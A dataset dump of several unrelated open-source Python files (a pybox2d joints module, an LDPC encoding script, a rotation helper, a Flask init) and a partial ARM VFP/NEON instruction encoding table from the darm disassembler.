339ef85148fe55aaa28cf0f86e5f3b80b5277dee | 1,964 | py | Python | pypybox2d/joints/__init__.py | the-mba/Progra-Super-Mario | 90dc2a4ba815732b6e92652c7f8bb4a345d25e91 | [
"MIT"
] | null | null | null | pypybox2d/joints/__init__.py | the-mba/Progra-Super-Mario | 90dc2a4ba815732b6e92652c7f8bb4a345d25e91 | [
"MIT"
] | null | null | null | pypybox2d/joints/__init__.py | the-mba/Progra-Super-Mario | 90dc2a4ba815732b6e92652c7f8bb4a345d25e91 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# C++ version Copyright (c) 2006-2011 Erin Catto http://www.box2d.org
# Python port by Ken Lauer / http://pybox2d.googlecode.com
#
# This software is provided 'as-is', without any express or implied
# warranty. In no event will the authors be held liable for any damages
# arising from the use of this software.
# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:
# 1. The origin of this software must not be misrepresented; you must not
# claim that you wrote the original software. If you use this software
# in a product, an acknowledgment in the product documentation would be
# appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be
# misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
from __future__ import absolute_import
__all__ = ('Joint', 'DistanceJoint', 'RevoluteJoint', 'FrictionJoint',
'PrismaticJoint', 'WeldJoint', 'RopeJoint', 'WheelJoint',
'MouseJoint', 'PulleyJoint', 'GearJoint',
'INACTIVE_LIMIT', 'AT_LOWER_LIMIT', 'AT_UPPER_LIMIT', 'EQUAL_LIMITS',
'ALLOWED_STRETCH')
__version__ = "$Revision: 352 $"
__date__ = "$Date: 2011-07-14 20:14:23 -0400 (Thu, 14 Jul 2011) $"
# $Source$
from .joint import (INACTIVE_LIMIT, AT_LOWER_LIMIT, AT_UPPER_LIMIT, EQUAL_LIMITS, ALLOWED_STRETCH)
from .joint import Joint
from .distance import DistanceJoint
from .revolute import RevoluteJoint
from .friction import FrictionJoint
from .prismatic import PrismaticJoint
from .weld import WeldJoint
from .rope import RopeJoint
from .wheel import WheelJoint
from .mouse import MouseJoint
from .pulley import PulleyJoint
from .gear import GearJoint
| 42.695652 | 99 | 0.735234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,312 | 0.668024 |
339fda81b9c470880acae060465b85a254b0eac1 | 3,939 | py | Python | LDPC-library/encode.py | sz3/ProtographLDPC | 0fe057a58d94a2c1f8599c6718e24a027113818c | [
"MIT"
] | 22 | 2020-08-27T00:24:30.000Z | 2021-12-31T07:11:21.000Z | LDPC-library/encode.py | sz3/ProtographLDPC | 0fe057a58d94a2c1f8599c6718e24a027113818c | [
"MIT"
] | 1 | 2021-06-30T16:50:38.000Z | 2021-06-30T16:50:38.000Z | LDPC-library/encode.py | sz3/ProtographLDPC | 0fe057a58d94a2c1f8599c6718e24a027113818c | [
"MIT"
] | 6 | 2020-11-04T11:11:00.000Z | 2021-06-30T16:48:39.000Z | import subprocess
import os
import argparse
import tempfile
def get_parser():
# argument parser
parser = argparse.ArgumentParser(description='Input')
parser.add_argument('--pchk-file', '-p',
action='store',
dest='pchk_file',
type=str,
help='Parity check file.\
An additional .transmitted file should be present when \
puncturing is being used.\
For example, when this argument is my.pchk, \
then the program will search for my.pchk.transmitted \
and use it for puncturing if avilable.',
required=True)
parser.add_argument('--gen-file', '-g',
action='store',
dest='gen_file',
type=str,
help='Generator matrix file. Required for encoding.',
required=True)
parser.add_argument('--input-file', '-i',
action='store',
dest='input_file',
type=str,
help='Input file containing one or more message blocks (one per line).',
required=True)
parser.add_argument('--output-file', '-o',
action='store',
dest='output_file',
type=str,
help='Output file to store encoded blocks (one per line). \
An additional output_file.unpunctured is generated when puncturing is used \
and contains all the codeword bits including punctured bits, to enable easy \
extraction of message bits from the codeword.',
required=True)
return parser
def main():
parser = get_parser()
args = parser.parse_args()
pchk_file = args.pchk_file
transmitted_bits_file = pchk_file + ".transmitted"
gen_file = args.gen_file
src_file = args.input_file
out_path = args.output_file
# get path to LDPC library encode script
ldpc_library_path = os.path.join(os.path.dirname(__file__), os.path.pardir, 'LDPC-codes')
ldpc_encode_path = os.path.join(ldpc_library_path, 'encode')
# first perform the encoding
subprocess.run(ldpc_encode_path + ' ' + pchk_file + ' ' + gen_file +
' ' + src_file + ' ' + out_path, shell=True)
if not os.path.exists(transmitted_bits_file):
print("INFO: No .transmitted file found. Assuming no puncturing.")
else:
print("INFO: Performing puncturing.")
# we need to perform puncturing, i.e., remove the untransmitted bits
# first load the transmitted bit information
with open(transmitted_bits_file) as f:
line1 = f.readline().rstrip('\n')
num_total_bits = int(line1.split(' ')[-1]) # this is the total bit count line
line2 = f.readline().rstrip('\n')
transmitted_bits = [int(i) for i in line2.split(' ')]
# sort for convenience
transmitted_bits.sort()
# we will write the punctured codewords to a temporary file first
with tempfile.NamedTemporaryFile(mode='w', delete=False, dir=os.getcwd()) as f:
tmpfilename = f.name
with open(out_path) as fin:
for line in fin:
line = line.rstrip('\n')
assert len(line) == num_total_bits
extracted_transmitted_bits = ''.join([line[i] for i in transmitted_bits])
f.write(extracted_transmitted_bits + '\n')
# write punctured data from tempfile to output path
os.replace(out_path,out_path+'.unpunctured')
os.replace(tmpfilename, out_path)
if __name__ == '__main__':
main()
| 41.904255 | 101 | 0.551409 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,512 | 0.383854 |
33a406fd3d5662cdfecad65c9a454e308ebff473 | 274 | py | Python | survivethevoid/utils/math_func.py | LMikeH/SurviveTheVoid | e517870d1dca388a54f8f523879c6c8583101a02 | [
"bzip2-1.0.6"
] | null | null | null | survivethevoid/utils/math_func.py | LMikeH/SurviveTheVoid | e517870d1dca388a54f8f523879c6c8583101a02 | [
"bzip2-1.0.6"
] | null | null | null | survivethevoid/utils/math_func.py | LMikeH/SurviveTheVoid | e517870d1dca388a54f8f523879c6c8583101a02 | [
"bzip2-1.0.6"
] | null | null | null | import numpy as np
def R(angle):
rad_angle = (angle)*np.pi/180
return np.array([[np.cos(rad_angle), -np.sin(rad_angle)],
[np.sin(rad_angle), np.cos(rad_angle)]])
if __name__ == "__main__":
a = np.array([0, 1])
print(np.dot(R(180), a))
| 24.909091 | 61 | 0.572993 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.036496 |
33a43569f2dc889b1051e353b42c5978e08a2be2 | 35 | py | Python | app/__init__.py | lwalter/flask-angular-starter | 31d5468777d429701c8ae0e790458a980fee6837 | [
"MIT"
] | 13 | 2016-03-24T03:12:05.000Z | 2021-03-15T14:58:36.000Z | app/__init__.py | lwalter/flask-angular-starter | 31d5468777d429701c8ae0e790458a980fee6837 | [
"MIT"
] | 7 | 2016-03-24T03:20:05.000Z | 2017-07-19T03:06:13.000Z | app/__init__.py | lwalter/flask-angular-starter | 31d5468777d429701c8ae0e790458a980fee6837 | [
"MIT"
] | 4 | 2017-06-22T05:52:08.000Z | 2022-02-25T15:25:57.000Z | from app.factory import create_app
| 17.5 | 34 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33a4eb8004a4d73add7bc089b176207822d20abb | 39,949 | py | Python | darmtbl3.py | TaintTrap/darm | f42b509adabbb3a0fbb87937db33d14c2d213bee | [
"BSD-3-Clause"
] | 104 | 2015-01-01T06:14:40.000Z | 2021-12-11T08:05:03.000Z | darmtbl3.py | z4ziggy/darm | f42b509adabbb3a0fbb87937db33d14c2d213bee | [
"BSD-3-Clause"
] | 5 | 2015-02-09T10:16:50.000Z | 2016-04-07T12:58:10.000Z | darmtbl3.py | z4ziggy/darm | f42b509adabbb3a0fbb87937db33d14c2d213bee | [
"BSD-3-Clause"
] | 18 | 2015-02-09T02:36:19.000Z | 2019-07-19T15:29:20.000Z | from darmtbl2 import Bitsize, Rn, Rm, Rt, Rt2
from darmtbl2 import i, imm3, imm4, imm6, imm8, imm4H, imm4L
from darmtbl2 import P, W, D, N, M, cond
Vd = Bitsize('Vd', 4, 'Vector Destination Register')
Vn = Bitsize('Vn', 4, 'Vector Source Register')
Vm = Bitsize('Vm', 4, 'Second Vector Source Register')
Q = Bitsize('Q', 1, 'Q')
F = Bitsize('F', 1, 'Floating Point Operation')
T = Bitsize('T', 1, 'lowbit')
B = Bitsize('B', 1, 'B')
L = Bitsize('L', 1, 'shift amount etc')
U = Bitsize('U', 1, 'Unsigned')
E = Bitsize('E', 1, 'Quiet NaN Exception')
size = Bitsize('size', 2, 'VFP Vector Size')
sz = Bitsize('sz', 1, '1-bit VFP Vector Size')
sf = Bitsize('sf', 1, 'Vector Size')
sx = Bitsize('sx', 1, 'Bit Size')
cmode = Bitsize('cmode', 4, 'SIMD Expand Mode')
align = Bitsize('align', 2, 'Memory Alignment')
index_align = Bitsize('index_align', 4, 'Memory Index Alignment')
a = Bitsize('a', 1, 'Memory Alignment')
op = Bitsize('op', 1, '1-bit Operation')
op2 = Bitsize('op2', 2, '2-bit Operation')
type_ = Bitsize('type', 4, 'Some Type')
len_ = Bitsize('len', 2, 'Length for Vector Table Lookup')
opc1 = Bitsize('opc1', 2, 'opc1')
opc2 = Bitsize('opc2', 3, 'opc2')
opc2_2 = Bitsize('opc2', 2, 'opc2')
VFP_ARMv7 = [
('VABA<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 1, 1, N, Q, M, 1, Vm),
('VABAL<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, 1, 0, 1, N, 0, M, 0, Vm),
('VABD<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 1, 1, N, Q, M, 0, Vm),
('VABDL<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, 1, 1, 1, N, 0, M, 0, Vm),
('VABD<c>.F32', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VABS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 1, 0, Q, M, 0, Vm),
('VABS<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 0, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 1, Vm),
('VADD<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 0, Vm),
('VADD<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VADD<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 1, 1, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VADDHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 0, 1, 0, 0, N, 0, M, 0, Vm),
('VADDL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, 0, 0, op, N, 0, M, 0, Vm),
('VAND<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VBIC<c>.<dt> <Qd>,#<imm>', 1, 1, 1, 1, 0, 0, 1, i, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 1, 1, imm4),
('VBIC<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, 1, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('V<op><c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, op2, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VCEQ<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 1, Vm),
('VCEQ<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCEQ<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 1, 0, Q, M, 0, Vm),
('VCGE<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 1, 1, N, Q, M, 1, Vm),
('VCGE<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCGE<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 0, 1, Q, M, 0, Vm),
('VCGT<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 1, 1, N, Q, M, 0, Vm),
('VCGT<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
('VCGT<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 0, 0, Q, M, 0, Vm),
('VCLE<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 1, 1, Q, M, 0, Vm),
('VCLS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 0, 0, Q, M, 0, Vm),
('VCLT<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 0, 0, Q, M, 0, Vm),
('VCLZ<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 0, 1, Q, M, 0, Vm),
('VCMP{E}<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 0, 0, Vd, 1, 0, 1, sz, E, 1, M, 0, Vm),
('VCMP{E}<c>.F64 <Dd>,#0.0', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 0, 1, Vd, 1, 0, 1, sz, E, 1, (0), 0, (0), (0), (0), (0)),
('VCNT<c>.8 <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 1, 0, Q, M, 0, Vm),
('VCVT<c>.<Td>.<Tm> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 1, op2, Q, M, 0, Vm),
('VCVT{R}<c>.S32.F64 <Sd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 1, opc2, Vd, 1, 0, 1, sz, op, 1, M, 0, Vm),
('VCVT<c>.<Td>.<Tm> <Qd>,<Qm>,#<fbits>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 1, 1, 1, op, 0, Q, M, 1, Vm),
('VCVT<c>.<Td>.F64 <Dd>,<Dd>,#<fbits>', cond, 1, 1, 1, 0, 1, D, 1, 1, 1, op, 1, U, Vd, 1, 0, 1, sf, sx, 1, i, 0, imm4),
('VCVT<c>.F64.F32 <Dd>,<Sm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 1, 1, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('VCVT<c>.F32.F16 <Qd>,<Dm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 1, 1, op, 0, 0, M, 0, Vm),
('VCVT<y><c>.F32.F16 <Sd>,<Sm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 1, op, Vd, 1, 0, 1, (0), T, 1, M, 0, Vm),
('VDIV<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 1, D, 0, 0, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VDUP<c>.<size>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, imm4, Vd, 1, 1, 0, 0, 0, Q, M, 0, Vm),
('VDUP<c>.<size>', cond, 1, 1, 1, 0, 1, B, Q, 0, Vd, Rt, 1, 0, 1, 1, D, 0, E, 1, (0), (0), (0), (0)),
('VEOR<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 0, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VEXT<c>.8 <Qd>,<Qn>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, 1, 1, Vn, Vd, imm4, N, Q, M, 0, Vm),
('VFM<y><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, op, sz, Vn, Vd, 1, 1, 0, 0, N, Q, M, 1, Vm),
('VFM<y><c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('VFNM<y><c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 1, D, 0, 1, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('VH<op><c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, op, 0, N, Q, M, 0, Vm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, size, 0, 0, index_align, Rm),
('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, 1, 1, 0, 0, size, T, a, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, size, 0, 1, index_align, Rm),
('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, 1, 1, 0, 1, size, T, a, Rm),
('VLD3<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, size, 1, 0, index_align, Rm),
('VLD3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, 1, 1, 1, 0, size, T, a, Rm),
('VLD4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
('VLD4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, size, 1, 1, index_align, Rm),
('VLD4<c>.<size> <list>,[<Rn>{ :<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, 1, 1, 1, 1, size, T, a, Rm),
('VLDM{mode}<c> <Rn>{!},<list>', cond, 1, 1, 0, P, U, D, W, 1, Rn, Vd, 1, 0, 1, 1, imm8),
('VLDM{mode}<c> <Rn>{!},<list>', cond, 1, 1, 0, P, U, D, W, 1, Rn, Vd, 1, 0, 1, 0, imm8),
('VLDR<c> <Dd>,[<Rn>{,#+/-<imm>}]', cond, 1, 1, 0, 1, U, D, 0, 1, Rn, Vd, 1, 0, 1, 1, imm8),
('VLDR<c> <Sd>,[<Rn>{,#+/-<imm>}]', cond, 1, 1, 0, 1, U, D, 0, 1, Rn, Vd, 1, 0, 1, 0, imm8),
('V<op><c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 1, 0, N, Q, M, op, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
('V<op><c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, op, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 0, Vm),
('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 1, 0, op, 0, N, 0, M, 0, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, op, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
('V<op><c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 0, 0, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('V<op><c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, Q, 1, D, size, Vn, Vd, 0, op, 0, F, N, 1, M, 0, Vm),
('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, op, 1, 0, N, 1, M, 0, Vm),
('VMOV<c>.<dt> <Qd>,#<imm>', 1, 1, 1, 1, 0, 0, 1, i, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, op, 1, imm4),
('VMOV<c>.F64 <Dd>,#<imm>', cond, 1, 1, 1, 0, 1, D, 1, 1, imm4H, Vd, 1, 0, 1, sz, (0), 0, (0), 0, imm4L),
('VMOV<c> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, 0, Vm, Vd, 0, 0, 0, 1, M, Q, M, 1, Vm),
('VMOV<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 0, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
('VMOV<c>.<size> <Dd[x]>,<Rt>', cond, 1, 1, 1, 0, 0, opc1, 0, Vd, Rt, 1, 0, 1, 1, D, opc2_2, 1, (0), (0), (0), (0)),
('VMOV<c>.<dt> <Rt>,<Dn[x]>', cond, 1, 1, 1, 0, U, opc1, 1, Vn, Rt, 1, 0, 1, 1, N, opc2_2, 1, (0), (0), (0), (0)),
('VMOV<c> <Sn>,<Rt>', cond, 1, 1, 1, 0, 0, 0, 0, op, Vn, Rt, 1, 0, 1, 0, N, (0), (0), 1, (0), (0), (0), (0)),
('VMOV<c> <Sm>,<Sm1>,<Rt>,<Rt2>', cond, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VMOV<c> <Dm>,<Rt>,<Rt2>', cond, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 1, 0, 0, M, 1, Vm),
('VMOVL<c>.<dt> <Qd>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm3, 0, 0, 0, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VMOVN<c>.<dt> <Dd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, 0, 0, M, 0, Vm),
('VMRS<c> <Rt>,FPSCR', cond, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
('VMSR<c> FPSCR,<Rt>', cond, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
('VMUL<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, op, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 1, Vm),
('VMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 1, 1, op, 0, N, 0, M, 0, Vm),
('VMUL<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
('VMUL<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VMUL<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, Q, 1, D, size, Vn, Vd, 1, 0, 0, F, N, 1, M, 0, Vm),
('VMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 1, 0, 1, 0, N, 1, M, 0, Vm),
('VMVN<c>.<dt> <Qd>,#<imm>', 1, 1, 1, 1, 0, 0, 1, i, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 1, 1, imm4),
('VMVN<c> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 1, 1, Q, M, 0, Vm),
('VNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 1, 1, Q, M, 0, Vm),
('VNEG<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
('VNMLA<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 0, 1, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('UInt(Vd:D);', cond, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
('VORN<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, 1, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VORR<c>.<dt> <Qd>,#<imm>', 1, 1, 1, 1, 0, 0, 1, i, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 0, 1, imm4),
('VORR<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VPADAL<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 0, op, Q, M, 0, Vm),
('VPADD<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 1, Vm),
('VPADD<c>.F32', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VPADDL<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 1, 0, op, Q, M, 0, Vm),
('VP<op><c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 1, 0, 1, 0, N, Q, M, op, Vm),
('VP<op><c>.F32', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
('VPOP <list>', cond, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
('VPOP <list>', cond, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
('VPUSH<c> <list>', cond, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
('VPUSH<c> <list>', cond, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
